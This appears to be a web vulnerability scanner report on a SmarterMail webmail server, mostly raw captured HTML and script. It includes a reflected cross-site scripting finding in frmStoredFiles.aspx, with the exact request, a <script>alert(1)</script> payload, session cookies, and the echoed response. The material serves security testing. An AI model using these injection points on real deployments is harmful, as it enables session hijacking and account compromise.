   <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
       <li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuSelectAll' style='z-index: 1001'><a class='hmA' href='#'>Select All</a></li>
       <li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuDelete' style='z-index: 1001'><a class='hmA' href='#'>Delete</a></li>
       <li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuEmailSelected' style='z-index: 1001'><a class='hmA' href='#'>Send Email</a></li>
       <li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuAddToOutlook' style='z-index: 1001'><a class='hmA' href='#'>Add to Outlook</a></li>
       <li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuImportExport' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>Import/Export<span class='hmArrow'></span></a>
       <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
           <li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuImportExport_menuImport' style='z-index: 1001'><a class='hmA' href='#'>Import</a></li>
           <li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuImportExport_menuExport' style='z-index: 1001'><a class='hmA' href='#'>Export</a></li>
           <li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuImportExport_menuExportAll' style='z-index: 1001'><a class='hmA' href='#'>Export All</a></li>
       </ul><div class='hmScrollDown'></div></div>
       </li>
   </ul><div class='hmScrollDown'></div></div>
   </li>
   <li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>View<span class='hmArrow'></span></a>
   <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
       <li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>Filter<span class='hmArrow'></span></a>
       <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
           <li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>Category<span class='hmArrow'></span></a>
           <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
               <li class='hmItem hmFirst hmLast hmCheckable hmChecked' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory_menuCategoryAllCategories' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory_menuCategoryAllCategories_CB' group='category' type='checkbox'checked='checked'></div>All Categories</a></li>
           </ul><div class='hmScrollDown'></div></div>
           </li>
           <li class='hmSeperator' style='z-index:1001'><span><!-- --></span></li>
           <li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterClear' style='z-index: 1001'><a class='hmA' href='#'>Reset Filter</a></li>
       </ul><div class='hmScrollDown'></div></div>
       </li>
       <li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>Sort<span class='hmArrow'></span></a>
       <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
           <li class='hmItem hmFirst hmCheckable hmChecked' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortAsc' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortAsc_CB' group='Sort' type='checkbox'checked='checked'></div>Ascending</a></li>
           <li class='hmItem hmCheckable' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortDesc' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortDesc_CB' group='Sort' type='checkbox'></div>Descending</a></li>
           <li class='hmSeperator' style='z-index:1001'><span><!-- --></span></li>
           <li class='hmItem hmCheckable hmChecked' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortDisplayName' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortDisplayName_CB' group='SortType' type='checkbox'checked='checked'></div>Display Name</a></li>
           <li class='hmItem hmCheckable' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortEmailAddress' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortEmailAddress_CB' group='SortType' type='checkbox'></div>Email</a></li>
           <li class='hmItem hmLast hmCheckable' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortCompany' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortCompany_CB' group='SortType' type='checkbox'></div>Company</a></li>
       </ul><div class='hmScrollDown'></div></div>
       </li>
       <li class='hmSeperator' style='z-index:1001'><span><!-- --></span></li>
       <li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuColumns' style='z-index: 1001'><a class='hmA' href='#'>Visible Fields</a></li>
   </ul><div class='hmScrollDown'></div></div>
   </li>
</ul>
</div>
<div class='hmClear'><!-- --></div>

</div>
<div id="FilterBar" class="FilterBar" style="visibility: hidden">
   
<div id="FilterBarContents" class="RoundedSearchBox">
   <div class="RoundedSearchBoxLeft">
       <div class="RoundedSearchBoxRight">
           <label for="ctl00_Split_LP_ctl01_searchBarContacts_FilterBox" id="ctl00_Split_LP_ctl01_searchBarContacts_FilterBoxLabel" style="display: none">Search...</label>
           <div id="ctl00_Split_LP_ctl01_searchBarContacts_btnGo" class="BBButton GoButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$Split$LP$ctl01$searchBarContacts$btnGo',''); return false;"><span class="BBInner"></span></a></div>
           <input name="ctl00$Split$LP$ctl01$searchBarContacts$FilterBox" type="text" value="Search..." id="ctl00_Split_LP_ctl01_searchBarContacts_FilterBox" autocomplete="off" />
           <div id="ctl00_Split_LP_ctl01_searchBarContacts_btnClear" class="BBButton ClearButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$Split$LP$ctl01$searchBarContacts$btnClear',''); return false;"><span class="BBInner"></span></a></div>
       </div>
   </div>
</div>


   <a id="ctl00_Split_LP_ctl01_lnkFilter" href="javascript:__doPostBack('ctl00$Split$LP$ctl01$lnkFilter','')"></a>
</div>

<div id="LeftScrollable" class="ContentDiv">
   <span id="ctl00_Split_LP_ctl01_HyperMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_Split_LP_ctl01_ctl00' name='ctl00$Split$LP$ctl01$ctl00' style='z-index:800'>
   <li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_ctl00_hm0' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
   <li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_ctl00_hm1' style='z-index: 800'><a class='hmA' href='#'>Send Email</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
   
<table id="ctl00_Split_LP_ctl01_grdContactsOuterTable" class="HyperGridOuter" style="border-collapse:collapse;border-spacing:0px;width:100%;">
   <tr>
       <td class="HyperGridContentCell" id="ctl00_Split_LP_ctl01_grdContactsContentCell" style="padding:0;vertical-align:top;" >
           <div class="HyperGridWrapper" id="ctl00_Split_LP_ctl01_grdContacts" style="padding-right:0;">
               <div id="ctl00_Split_LP_ctl01_grdContactsHeaderWrapper" style="display:none">
                   <table id="ctl00_Split_LP_ctl01_grdContactsHeaderTable" class="HyperGrid" style="table-layout: fixed">
<colgroup><col /><col /></colgroup>
<thead>
<tr><th scope="col" class="showsel lc nw CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_Split_LP_ctl01_grdContactsCheckAll" name="ctl00$Split$LP$ctl01$grdContactsCheckAll" /></th><th scope="col" class="rc al nw BoldFirstMultiLine" style="overflow: hidden">Contact</th></tr>
</thead>
                   </table>
               </div>
               <div id="ctl00_Split_LP_ctl01_grdContactsContentWrapper" class="HyperGridContentWrapper" style="overflow-y:hidden;overflow-x:visible;">
                   <table id="ctl00_Split_LP_ctl01_grdContactsContentTable" class="HyperGrid">
<colgroup><col /><col /></colgroup>
                   </table>
               </div>
           </div>
       </td>
   </tr>
</table>
<div id="ctl00_Split_LP_ctl01_grdContactsScroller" class="HyperGridScroller" style="visibility:hidden;position:relative;width:22px;overflow-y:scroll;" ><div id="ctl00_Split_LP_ctl01_grdContactsInnerScroller" style="height: 10px"></div></div>
<div style="position:absolute;top:-100px;width:0;height:0;">
<input id="ctl00_Split_LP_ctl01_grdContactsFocuser" type="text" style="width:1px;height:1px;margin:0;padding:0;outline:none;border:none" />
<input id="ctl00_Split_LP_ctl01_grdContactsSelectedIDs" name="ctl00$Split$LP$ctl01$grdContactsSelectedIDs" type="text" style="width:1px;height:1px;margin:0;padding:0;outline:none;border:none" />
<input id="ctl00_Split_LP_ctl01_grdContactsScrollPos" name="ctl00$Split$LP$ctl01$grdContactsScrollPos" type="text" style="width:1px;height:1px;margin:0;padding:0;outline:none;border:none" />
</div>
</div>
<div id="ctl00_Split_LP_ctl01_Footer" class="Footer">
   <div class="FooterSummary">
       <span id="ctl00_Split_LP_ctl01_lblCount">0 contact(s)</span>
   </div>
</div>

|0|hiddenField|__EVENTTARGET||0|hiddenField|__EVENTARGUMENT||208|hiddenField|__VIEWSTATE|/wEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZBgBBSBjdGwwMCRTcGxpdCRMUCRjdGwwMSRncmRDb250YWN0cw8FJFRydWV8VHJ1ZXx8RmFsc2V8VHJ1ZXx8RmFsc2V8RmFsc2V8MGT8XpaY8h6fxawd0JLTm1yS3kkTOg==|24|asyncPostBackControlIDs||ctl00$Split$LP$lnkUpdate|0|postBackControlIDs|||34|updatePanelIDs||tctl00$Split$LP$StyledUpdatePanel1|0|childUpdatePanelIDs|||33|panelsToRefreshIDs||ctl00$Split$LP$StyledUpdatePanel1|2|asyncPostBackTimeout||90|12|formAction||Default.aspx|36|pageTitle||Contacts - hoytllc.com - SmarterMail|170|scriptBlock|ScriptPath|/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstCjdZSr2uDpU6O2NTF1ISnP_zYh5FLRQP7rbZ36OXJ90&t=ffffffff8fb8c655|796|scriptBlock|ScriptContentWithTags|{"text":"\r\n var startup = function() {\r\n $(\"#FilterBarContents\").magicLabels();\r\n\r\n $(\"#ctl00_Split_LP_ctl01_searchBarContacts_FilterBox\").keypress(function(event) {\r\n if (event.keyCode == 13) {\r\n __doPostBack(\u0027ctl00$Split$LP$ctl01$searchBarContacts$btnGo\u0027,\u0027\u0027);\r\n event.preventDefault();\r\n }\r\n });\r\n\r\n $(\"#ctl00_Split_LP_ctl01_searchBarContacts_btnClear\").click(function() {\r\n $(\"#ctl00_Split_LP_ctl01_searchBarContacts_FilterBox\").val(\u0027\u0027);\r\n $(\"#FilterBarContents\").magicLabels();\r\n });\r\n }\r\n setTimeout(startup, 1);\r\n\t","type":"text/javascript"}|3542|scriptBlock|ScriptContentWithTags|{"text":"\r\n\t\tself.AdditionalResizeLeftBar = function() {\r\n\t\t\tvar grid = self[\"ctl00_Split_LP_ctl01_grdContacts\"];\r\n\t\t\tif (grid != null && grid.Resize) grid.Resize();\r\n\t\t\t$(\u0027#FilterBarContents input:first\u0027).ResizeSearchBox();\r\n\t\t\tvar width = $(\u0027#SectionHeader\u0027).width();\r\n\t\t\tvar anchor = $(\u0027#ctl00_Split_LP_ctl01_menuContactsSourceTitle a:first\u0027).css({ overflow: \u0027\u0027, width: \u0027\u0027 });\r\n\t\t\tif (anchor.width() \u003e width - 30) anchor.css(\u0027overflow\u0027, \u0027hidden\u0027).width(width - 30);\r\n\t\t};\r\n\t\tdocument.rowHeight = null;\r\n\t\tself.LeftBarReady = function() {\r\n\t\t\t$get(\u0027LeftScrollable\u0027).dispose = function() {\r\n\t\t\t\tself.AdditionalResizeLeftBar = null;\r\n\t\t\t\tself.DoDelete = null;\r\n\t\t\t\tself.DoFilter = null;\r\n\t\t\t\tself.DoubleClick = null;\r\n\t\t\t\tself.NavPreviewPane = null;\r\n\t\t\t\tself.LeftBarReady = null;\r\n\t\t\t\tself.SelectAll = null;\r\n\t\t\t\tself.ShowColumnSelector = null;\r\n\t\t\t\tself.UpdateGrid = null;\r\n\t\t\t\tgrdContacts = null;\r\n\t\t\t};\r\n\r\n\t\t\t$(\u0027#SectionHeaderText, #PageTitleDropDown\u0027).click(function(evt) {\r\n\t\t\t\tevt.stopImmediatePropagation();\r\n\t\t\t\tvar bar = $get(\u0027SectionHeader\u0027);\r\n\t\t\t\tvar Pos = $(bar).position();\r\n\t\t\t\t$(\u0027#ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource\u0027).showHyperContextMenu({ clientX: Pos.left + 4, clientY: Pos.top + bar.offsetHeight }, this)\r\n\t\t\t});\r\n\r\n\t\t\tif (self.ResizeLeftBar) ResizeLeftBar();\r\n\t\t\t$(\u0027#FilterBar\u0027).css(\u0027visibility\u0027, \u0027\u0027);\r\n\r\n\t\t\t//var arrow = $(\u0027#ctl00_Split_LP_ctl01_menuContactsSourceTitle a:first .hmArrow:first\u0027);\r\n\t\t\t//arrow.appendTo(arrow.parent().parent());\r\n\t\t};\r\n\t\tfunction DoDelete() { // \r\nDoDeleteQuery_ctl00_Split_LP_ctl01_btnDelete();\r\n\t\t}\r\n\t\tfunction DoubleClick(newUrl, uid, isNew) {\r\n\t\t\tOpenUniqueNewMessage(newUrl, 600, 400, uid.replace(/[^a-zA-Z1-9]/g, \"\"));\r\n\t\t}\r\n\t\tfunction NavPreviewPane(newUrl, isNew, mark, uid) {\r\n\t\t\tSetPanelLoadedState(\"Contacts\", uid);\r\n\t\t\tUpdateFrame(newUrl);\r\n\t\t}\r\n\t\tfunction DoExport(url) {\r\n\t\t\tvar iFrame = $get(\u0027exportIframe\u0027);\r\n\t\t\tif (iFrame == null)\r\n\t\t\t\tiFrame = $(\"\u003ciframe id=\u0027exportIframe\u0027 style=\u0027height: 0; width: 0; position: absolute; top: -200px;\u0027 src=\u0027javascript:\\\u0027\\\u0027;\u0027\u003e\u003c/iframe\u003e\").appendTo($(\u0027form\u0027))[0];\r\n\t\t\tSetIFrameSrc(iFrame, url);\r\n\t\t}\r\n\t\tfunction DoFilter() { //\r\n__doPostBack(\u0027ctl00$Split$LP$ctl01$lnkFilter\u0027,\u0027\u0027);\r\n\t\t}\r\n\t\tfunction SelectAll() {\r\n\t\t\tvar cbox = $get(\u0027ctl00_Split_LP_ctl01_grdContactsCheckAll\u0027);\r\n\t\t\tcbox.checked = !cbox.checked;\r\n\t\t\tcbox.CheckAllHandler();\r\n\t\t}\r\n\t\tfunction UpdateGrid() {\r\n\t\t\tDoFilter();\r\n\t\t\ttry { _extContentElement.contentWindow.UpdateGrid(false); }\r\n\t\t\tcatch (ex) { }\r\n\t\t}\r\n\t\tfunction ShowColumnSelector() {\r\n\t\t\tSpawnHyperWindow(\u0027/UserControls/Popups/frmGridSetup.aspx?type=contacts\u0027, 410, 320, UpdateGrid);\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction OpenPopup(type, name, shareowner, calname) {\r\n\t\t\tSpawnHyperWindow(\"/Main/frmPopupAddToOutlook.aspx?type=\" + type + \"&name=\" + name + \"&shareowner=\" + shareowner + \"&calname=\" + calname, 450, 270);\r\n\t\t}\r\n\r\n\t","type":"text/javascript"}|20|scriptStartupBlock|ScriptContentNoTags|ClearTreeToggle();
|20|scriptStartupBlock|ScriptContentNoTags|SidebarAjaxLoaded();|43|scriptStartupBlock|ScriptContentNoTags|if (self.LeftBarReady) self.LeftBarReady();|220|scriptStartupBlock|ScriptContentNoTags|
function ShowContextMenu_ctl00_Split_LP_ctl01_ctl00(evt) {
   $('#ctl00_Split_LP_ctl01_ctl00').showHyperContextMenu(evt);
   evt.cancelBubble = true;
   if (evt.stopPropagation) evt.stopPropagation();
   return false;
}
|37|scriptStartupBlock|ScriptContentNoTags|UpdateSidebarCounts('UserSync', 0);
|1174|scriptStartupBlock|ScriptContentNoTags|
           var ctl00_Split_LP_ctl01_grdContacts = null;
           function LoadFuncctl00_Split_LP_ctl01_grdContacts() {
               var dataSource = {"rows":[],"checkedRows":[],"totalRows":0,"dirtyKey":"0","labelText":null,"additionalJavascript":null};
               ctl00_Split_LP_ctl01_grdContacts = new SuperHyperGrid('ctl00_Split_LP_ctl01_grdContacts', 0, 2, SMWeb.Services.svcSuperHyperGrid.GetData, 'ContactsView', 'Loading...', dataSource, -1, 1, 0, NavPreviewPane, 0, ShowContextMenu_ctl00_Split_LP_ctl01_ctl00, DoubleClick, DoDelete, false, 2, '\x7b0\x7d\x20selected\x20items', false, true, '5986f17e17ac4101ad20a3ebc87e429815544<script>alert(1)</script>17bad02815c', -1, '', '', false, '', [{"min":25,"max":25,"percent":false,"locked":true},{"min":100,"max":400,"percent":false,"locked":false}], '/Main/frmEmptyPreviewOuter.aspx?type=contacts', SMWeb.Services.svcSuperHyperGrid.MarkRead, false, false, true);
               dataSource = null;
               if (self.isCallback)
                   ctl00_Split_LP_ctl01_grdContacts.AutoSelect();
               else
                   window.setTimeout(function(){ctl00_Split_LP_ctl01_grdContacts.AutoSelect();},50);
               self.isCallback = true;
           }
$(LoadFuncctl00_Split_LP_ctl01_grdContacts);
|675|scriptStartupBlock|ScriptContentNoTags|function DoDeleteQuery_ctl00_Split_LP_ctl01_btnDelete() {
   if (!self.ctl00_Split_LP_ctl01_grdContacts) return ShowAlertWindow('No item has been selected');
   var count = ctl00_Split_LP_ctl01_grdContacts.GetSelectedRowCount ? ctl00_Split_LP_ctl01_grdContacts.GetSelectedRowCount() : ctl00_Split_LP_ctl01_grdContacts.GetSelectedRows().length;
   if (count == 0) return ShowAlertWindow('No item has been selected');
   else parent.ShowConfirmWindow('Are you sure you want to delete the {0} selected item(s)?',count,'Generic',DoDelete_ctl00_Split_LP_ctl01_btnDelete);
}
function DoDelete_ctl00_Split_LP_ctl01_btnDelete() { __doPostBack('ctl00$Split$LP$ctl01$btnDelete',''); }
|409|scriptStartupBlock|ScriptContentNoTags|$(function() { $('#ctl00_Split_LP_ctl01_menuContactsSourceTitle').hyperMenu({"ClearFloat":false,"IsContextMenu":false,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource_menuSourceManage":"SpawnHyperWindow(\u0027/Main/Sharing/frmMyShares.aspx?popup=true\u0027, 700, 400);"},"ClientCallbacks":{}}); });
|1500|scriptStartupBlock|ScriptContentNoTags|$(function() { $('#ctl00_Split_LP_ctl01_menuContacts').hyperMenu({"ClearFloat":true,"IsContextMenu":false,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_8e0bbef791a74eb3a81a9baf46d77453":"OpenNewMessage(\u0027/Main/frmCompose.aspx\u0027, 800, 600); return false;","ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_8a0ba520215e4dd8a08f1e0331c3eedc":"OpenNewMessage(\u0027/Main/frmContact.aspx\u0027, 600, 400); return false;","ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_f2e8f1304ff848b3b9f2b74409fcab56":"OpenNewMessage(\u0027/Main/Calendar/frmEvent.aspx\u0027, 600, 400); return false;","ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_094cfc874ad0439692e5c676fc29554f":"OpenNewMessage(\u0027/Main/frmTask.aspx\u0027, 600, 400); return false;","ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_74c667b2c32742c794ac67a6a4a1ed68":"OpenNewMessage(\u0027/Main/frmNote.aspx\u0027, 600, 400); return false;","ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuSelectAll":"SelectAll();","ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuDelete":"DoDeleteQuery_ctl00_Split_LP_ctl01_btnDelete();","ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuAddToOutlook":"javascript: OpenPopup(\u0027contacts\u0027,\u0027\u0027,\u0027testit\u0027,\u0027My\\x20Contacts\u0027)","ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuColumns":"ShowColumnSelector();"},"ClientCallbacks":{}}); });
|484|scriptStartupBlock|ScriptContentNoTags|$(function() { $('#ctl00_Split_LP_ctl01_ctl00').hyperMenu({"ClearFloat":false,"IsContextMenu":true,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_Split_LP_ctl01_ctl00_hm0":"DoDeleteQuery_ctl00_Split_LP_ctl01_btnDelete();","ctl00_Split_LP_ctl01_ctl00_hm1":"__doPostBack(\u0027ctl00$Split$LP$ctl01$menuContacts\u0027,\u0027ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuEmailSelected\u0027)"},"ClientCallbacks":{}}); });
|

2.2. http://vulnerable.smartermail.site:9998/Main/frmStoredFiles.aspx [path parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smartermail.site:9998
Path:   /Main/frmStoredFiles.aspx

Issue detail

The value of the path request parameter is copied into the HTML document as plain text between tags. The payload 884f7<script>alert(1)</script>aeedac4eebe was submitted in the path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Main/frmStoredFiles.aspx?path=884f7<script>alert(1)</script>aeedac4eebe HTTP/1.1
Host: vulnerable.smartermail.site:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.smartermail.site:9998/Default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dbg5avn0mzbrp22rculzvx55; SelectedLanguage=; settings=NqrSEiEtkzXQzORdp%2bg33xCkJy7Yi2at5xmX%2be4AJ2U%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"878548840","TopBarSection":"UserStorage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 16:14:06 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 27838



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   884f7<script>alert(1)</script>aeedac4eebe - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
   <form method="post" action="frmStoredFiles.aspx?path=884f7%3cscript%3ealert(1)%3c%2fscript%3eaeedac4eebe" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY3NjA2Njk1Nw8WBh4IX19fVGl0bGUFKTg4NGY3PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PmFlZWRhYzRlZWJlHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYIAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HgdWaXNpYmxlaGQCBg8WAh8EaGQCBw9kFgJmD2QWAgIBDxYCHwRoFgICAQ8WAh4EVGV4dGVkAggPFgIfBGhkGAEFE2N0bDAwJE1QSCRGaWxlc0dyaWQPBSRUcnVlfFRydWV8fEZhbHNlfFRydWV8fEZhbHNlfEZhbHNlfDBk8ai86oXOhpNMpdcvFwLYnH0ukjg=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&amp;t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = false;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$BPH$ButtonUpdatePanel','tctl00$UpdatePanel1','tctl00$MPH$GridUpdatePanel','tctl00$Scripts$UploaderPanel'], ['ctl00$BPH$DeleteButton','ctl00$MPH$UpdateGridButton'], [], 90);
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       884f7<script>alert(1)</script>aeedac4eebe
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <span id="ctl00_BPH_ButtonUpdatePanel">
           <div id="ctl00_BPH_PublishButton" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_PublishButton(); return false;"><span class="BBInner">Edit</span></a></div>
           <div id="ctl00_BPH_DeleteButton" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteButton(); return false;"><span class="BBInner">Delete</span></a></div>
           <div id="ctl00_BPH_UploadButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="return false;; return false;"><span class="BBInner">Upload</span></a></div>
       </span>
   <div class="TogglableButtons">
       <div id="ctl00_BPH_DownloadButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="CheckForRows();; return false;"><span class="BBInner">Download</span></a></div>
   </div>

           </div>
           <div class="ButtonBarRight">
               

           </div>
